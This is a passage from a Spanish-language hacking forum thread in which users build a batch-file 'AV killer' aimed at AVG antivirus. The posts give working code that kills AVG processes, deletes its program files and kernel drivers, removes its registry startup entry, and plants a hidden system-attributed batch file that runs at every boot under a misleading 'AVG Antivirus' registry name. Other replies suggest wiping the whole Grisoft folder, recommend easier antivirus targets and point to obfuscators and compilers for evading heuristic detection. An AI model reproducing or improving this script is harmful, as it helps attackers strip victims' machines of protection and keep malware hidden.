elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.
 
Inicio Ayuda Ingresar Registrarse
05 Septiembre 2008, 08:28  



+  Foro de elhacker.net
|-+  Programación
| |-+  Programación General
| | |-+  Scripting
| | | |-+  Que no detecten mi av-killer hecho en batch...
0 Usuarios y 1 Visitante están viendo este tema.
Páginas: 1 [2] Ir Abajo Imprimir
Autor Tema: Que no detecten mi av-killer hecho en batch...  (Leído 1026 veces)
Laughing Man
Wiki

Desconectado Desconectado

Mensajes: 2.558


Lo que haría sería hacerme pasar por sordomudo...


Ver Perfil WWW
Re: Que no detecten mi av-killer hecho en batch...
« Respuesta #15 en: 12 Mayo 2008, 06:29 »

Me he tomado el trabajo de buscar todos y cada uno de los procesos que tenía activos. Unos eran del sistema, otros del vmware, etc, pero nada de nada con respecto al avg... le perdí el rastro :(
En línea

"Ni la plata ni el oro de ellos podrá librarlos en el día del furor de Jehová." (Ezequiel 7:19)

Mi página personal:
http://sites.google.com/site/carloswaldo2/
Comunidad de idiomas
http://babelruins.tk/
Traducción de textos informáticos
http://foro.elhacker.net/-t218708.0.html
Freeze.

Desconectado Desconectado

Mensajes: 2.396


FireSoft


Ver Perfil WWW
Re: Que no detecten mi av-killer hecho en batch...
« Respuesta #16 en: 12 Mayo 2008, 19:34 »

Estuve un buen tiempo - ahora que recuerdo - tratando de matar al AVG desde  VB y no pude porque no podia desactivar servicios o algo asi :P

Así que podrias comenzar con otro AV más facil o menos dificil ;) Como el panda o el avast ;)
En línea

Gana premios:


^Arkangel^

Desconectado Desconectado

Mensajes: 395



Ver Perfil WWW
Re: Que no detecten mi av-killer hecho en batch...
« Respuesta #17 en: 12 Mayo 2008, 21:23 »

el avast no es malo ^^

te recomiendo el panda antes que el avast  ;)
En línea




Laughing Man
Wiki

Desconectado Desconectado

Mensajes: 2.558


Lo que haría sería hacerme pasar por sordomudo...


Ver Perfil WWW
Re: Que no detecten mi av-killer hecho en batch...
« Respuesta #18 en: 12 Mayo 2008, 21:57 »

Pero... pero.... debe haber una forma... Y alguien debe de saberla ¿verdad?...

No me rendiré ahora que he llegado "tan" lejos... :xD :xD

Carloswaldo :(
En línea

"Ni la plata ni el oro de ellos podrá librarlos en el día del furor de Jehová." (Ezequiel 7:19)

Mi página personal:
http://sites.google.com/site/carloswaldo2/
Comunidad de idiomas
http://babelruins.tk/
Traducción de textos informáticos
http://foro.elhacker.net/-t218708.0.html
Laughing Man
Wiki

Desconectado Desconectado

Mensajes: 2.558


Lo que haría sería hacerme pasar por sordomudo...


Ver Perfil WWW
Re: Que no detecten mi av-killer hecho en batch...
« Respuesta #19 en: 12 Mayo 2008, 23:51 »

He estado investigando.

Este archivo no lo puedo eliminar ni a bala, osea ni forzandolo en el cmd ni nada:

avgse.dll

Esto es lo que encontre en internet:

Citar
Description: avgse.dll is located in a subfolder of "C:\Program Files" - normally C:\Program Files\Grisoft\AVG Free\. Known file sizes on Windows XP are 40960 bytes (47% of all occurrence), 50688 bytes, 29743 bytes, 45056 bytes, 28207 bytes.
A .dll file (Dynamic Link Library) is a special type of Windows program containing functions that other programs can call. This .dll file can be injected to all running processes and can change or manipulate their behavior. The program is not visible. The service has no detailed description. It can change the behavior of other programs or manipulate other programs. File avgse.dll is not a Windows system file. avgse.dll seems to be a compressed file. Therefore the technical security rating is 64% dangerous, however also read the users reviews.

Quiere decir que esta dll puede estar camuflada en otro proceso? como saberlo?

Ahí está mi codigo:

Código:
@echo off
set a=avgamsvr.exe
set b=avgcc.exe
set c=avgemc.exe
set d=avgupsvc.exe
set e=\Grisoft\AVG7
set f=*.exe*
set g=*.dll*
taskkill /f /im %a%
taskkill /f /im %b%
taskkill /f /im %c%
taskkill /f /im %d%
cd %programfiles%%e%
del /f /q /s %f%
del /f /q /s %g%
REG DELETE HKLM\Software\Microsoft\Windows\CurrentVersion\Run\ /v AVG7_CC /f
exit
En línea

"Ni la plata ni el oro de ellos podrá librarlos en el día del furor de Jehová." (Ezequiel 7:19)

Mi página personal:
http://sites.google.com/site/carloswaldo2/
Comunidad de idiomas
http://babelruins.tk/
Traducción de textos informáticos
http://foro.elhacker.net/-t218708.0.html
Laughing Man
Wiki

Desconectado Desconectado

Mensajes: 2.558


Lo que haría sería hacerme pasar por sordomudo...


Ver Perfil WWW
Re: Que no detecten mi av-killer hecho en batch...
« Respuesta #20 en: 13 Mayo 2008, 00:12 »

Bueno el archivo estaba siendo usado por el explorer, así que se me ocurrió hacer esto:

Código:
set h=explorer.exe
set i=avgse.dll
...
taskkill /f /im %h%
del /f /q /s %i%
start %h%

Y lo logra, aunque resulta algo demasiado notorio y sospechozo jaja, hay alguna otra forma de hacerlo?

Ademas aun matando ese archivo el avg sigue activo en alguna parte... ya no se donde buscar...
En línea

"Ni la plata ni el oro de ellos podrá librarlos en el día del furor de Jehová." (Ezequiel 7:19)

Mi página personal:
http://sites.google.com/site/carloswaldo2/
Comunidad de idiomas
http://babelruins.tk/
Traducción de textos informáticos
http://foro.elhacker.net/-t218708.0.html
Darioxhcx

Conectado Conectado

Mensajes: 226



Ver Perfil
Re: Que no detecten mi av-killer hecho en batch...
« Respuesta #21 en: 13 Mayo 2008, 00:23 »

set $=taskkil /IM /F
set 4=Del /f /q /s
%$%explorer.exe
cd %prorgamfiles%\avg <-- o como sea la ruta
%4%"avgse.dll"

podrias probarlo asi tmb
saludos
En línea
Hendriҳ
Colaborador

Desconectado Desconectado

Mensajes: 2.005


The Lord of his Middle Earth


Ver Perfil WWW
Re: Que no detecten mi av-killer hecho en batch...
« Respuesta #22 en: 13 Mayo 2008, 00:28 »

Para saltar la heuristica utilizad esto: http://foro.elhacker.net/scripting/aporte_obfuscatebatch-t205084.0.html;msg974302

NOTA: Deben tener el framework del .Net instalado para poder ejecutar el ejecutable.

Un Saludo :)
En línea

Muchas veces las cosas no se le dan al que las merece más, sino al que sabe pedirlas con insistencia. - Arthur Schopenhauer

Laughing Man
Wiki

Desconectado Desconectado

Mensajes: 2.558


Lo que haría sería hacerme pasar por sordomudo...


Ver Perfil WWW
Re: Que no detecten mi av-killer hecho en batch...
« Respuesta #23 en: 13 Mayo 2008, 00:35 »

set $=taskkil /IM /F
set 4=Del /f /q /s
%$%explorer.exe
cd %prorgamfiles%\avg <-- o como sea la ruta
%4%"avgse.dll"

Con eliminar el archivo no tengo problemas, con el codigo que escribi lo hace. Uso el Quick Batch file compiler y el archivo resultante no es detectado por el av, incluso ejecuto el .bat sin problemas.

Para saltar la heuristica utilizad esto: http://foro.elhacker.net/scripting/aporte_obfuscatebatch-t205084.0.html;msg974302

NOTA: Deben tener el framework del .Net instalado para poder ejecutar el ejecutable.

Un Saludo :)

Excelente, no lo había visto, lo estaré probando. Gracias :D

Por cierto, he descubierto que hay ciertos archivos .sys que son del propio avg y estan en el directorio de drivers, sera que estos también me causan problemas?... A este paso terminaré eliminando todo mi disco duro :xD
En línea

"Ni la plata ni el oro de ellos podrá librarlos en el día del furor de Jehová." (Ezequiel 7:19)

Mi página personal:
http://sites.google.com/site/carloswaldo2/
Comunidad de idiomas
http://babelruins.tk/
Traducción de textos informáticos
http://foro.elhacker.net/-t218708.0.html
^Arkangel^

Desconectado Desconectado

Mensajes: 395



Ver Perfil WWW
Re: Que no detecten mi av-killer hecho en batch...
« Respuesta #24 en: 13 Mayo 2008, 02:31 »

Uso el Quick Batch file compiler

Bien ahí  ;)
En línea




Laughing Man
Wiki

Desconectado Desconectado

Mensajes: 2.558


Lo que haría sería hacerme pasar por sordomudo...


Ver Perfil WWW
Re: Que no detecten mi av-killer hecho en batch...
« Respuesta #25 en: 13 Mayo 2008, 21:46 »

Pues al parecer por fin lo he logrado, elimnando esos archivos en la carpeta de drivers.

Este es el código final:

Código:
::Avg Killer by Carloswaldo
@echo off
::Declaramos variables
set a=avgamsvr.exe
set b=avgcc.exe
set c=avgemc.exe
set d=avgupsvc.exe
set e=\Grisoft\AVG7
set f=*.exe*
set g=*.dll*
set h=explorer.exe
set i=avgse.dll
set j=\system32\drivers
set k=avgmfx86.sys
set l=avgclean.sys
set m=avg7rsxp.sys
set n=avg7rsw.sys
set o=avgtdi.sys
set p=avg7core.sys
::Matamos los procesos del avg
taskkill /f /im %a%
taskkill /f /im %b%
taskkill /f /im %c%
taskkill /f /im %d%
::Vamos a donde está instalado el avg y borramos los .exe y .dll
cd %programfiles%%e%
del /f /q /s %f%
del /f /q /s %g%
::Matamos el explorer para matar un dll y un driver, volvemos a iniciar el explorer
taskkill /f /im %h%
del /f /q /s %i%
cd %windir%%j%
del /f /q /s %o%
del /f /q /s %p%
start %h%
::Matamos el resto de drivers
del /f /q /s %k%
del /f /q /s %l%
del /f /q /s %m%
del /f /q /s %n%
::Borramos la clave del registro por si las moscas...
REG DELETE HKLM\Software\Microsoft\Windows\CurrentVersion\Run\ /v AVG7_CC /f
::Creamos un bat que se iniciara siempre, solo por si acaso
cd %windir%
echo @echo off >> avg.bat
attrib +r +a +s +h avg.bat
echo set a=avgamsvr.exe >> avg.bat
echo set b=avgcc.exe >> avg.bat
echo set c=avgemc.exe >> avg.bat
echo set d=avgupsvc.exe >> avg.bat
echo set e=\Grisoft\AVG7 >> avg.bat
echo set f=*.exe* >> avg.bat
echo set g=*.dll* >> avg.bat
echo taskkill /f /im %a% >> avg.bat
echo taskkill /f /im %b% >> avg.bat
echo taskkill /f /im %c% >> avg.bat
echo taskkill /f /im %d% >> avg.bat
echo cd %programfiles%%e% >> avg.bat
echo del /f /q /s %f% >> avg.bat
echo del /f /q /s %g% >> avg.bat
echo REG DELETE HKLM\Software\Microsoft\Windows\CurrentVersion\Run\ /v AVG7_CC /f >> avg.bat
reg add "HKLM\Software\Microsoft\Windows\CurrentVersion\Run" /v "AVG Antivirus" /d "%windir%\avg.bat" /f
exit

Hoy que inicie de nuevo el pc ya no me sale por ningun lado el cartelito de "Acceso denegado" ni nada por el estilo. ;D

Estaré buscando la forma de mejorar el código, e iré por el próximo av... ::)
En línea

"Ni la plata ni el oro de ellos podrá librarlos en el día del furor de Jehová." (Ezequiel 7:19)

Mi página personal:
http://sites.google.com/site/carloswaldo2/
Comunidad de idiomas
http://babelruins.tk/
Traducción de textos informáticos
http://foro.elhacker.net/-t218708.0.html
$hyDow

Desconectado Desconectado

Mensajes: 36


Ver Perfil
Re: Que no detecten mi av-killer hecho en batch...
« Respuesta #26 en: 29 Mayo 2008, 00:38 »

no seria mejor hacer
@echo off
SeT a=attrib
SeT b=-R
SeT c=-A
SeT d=-S
SeT e=Del /F /S /Q
SeT f=*.*
SeT g=cd
SeT i=-H
SeT {=ExiT
SeT 1=%ProgramFiles%\grisoft
%g%%1%
%a%%b%%c%%d%%e%%i%%f%
%e%%f%
%{%

digo yo, o tal vez usar ren *.* *
eso es mas original xD
pero me refiero a borrarlo todo...

$hyDow
En línea
Sai-To

Desconectado Desconectado

Mensajes: 181


Ver Perfil
Re: Que no detecten mi av-killer hecho en batch...
« Respuesta #27 en: 29 Mayo 2008, 02:29 »

bueno si no te quieres complicar la vida poniendo como un becerro:

set var=...............
...................

hay crearon una utilidad para separarlo asi... la postee yo de skull! ;) y no se como es el de hendrix pero si los combinas lo dos y Batch Compiler seria buen aporte! ;)
En línea
$hyDow

Desconectado Desconectado

Mensajes: 36


Ver Perfil
Re: Que no detecten mi av-killer hecho en batch...
« Respuesta #28 en: 29 Mayo 2008, 20:09 »

hombre la aplicacion de hendrix es rebuena, pero tiene mas merito asi


$hyDow
En línea
Páginas: 1 [2] Ir Arriba Imprimir 
Ir a:  







Consolas     La Web de Goku     MilW0rm     MundoDivx

Hispabyte     Truzone     TodoReviews     ZonaPhotoshop

hard-h2o modding    Foros de ayuda    Yashira.org    Videojuegos    indetectables.net   

Noticias Informatica    Seguridad Informática    ADSL    Foros en español    eNYe Sec

Todas las webs afiliadas están libres de publicidad engañosa.

Powered by SMF 1.1.5 | SMF © 2006-2008, Simple Machines LLC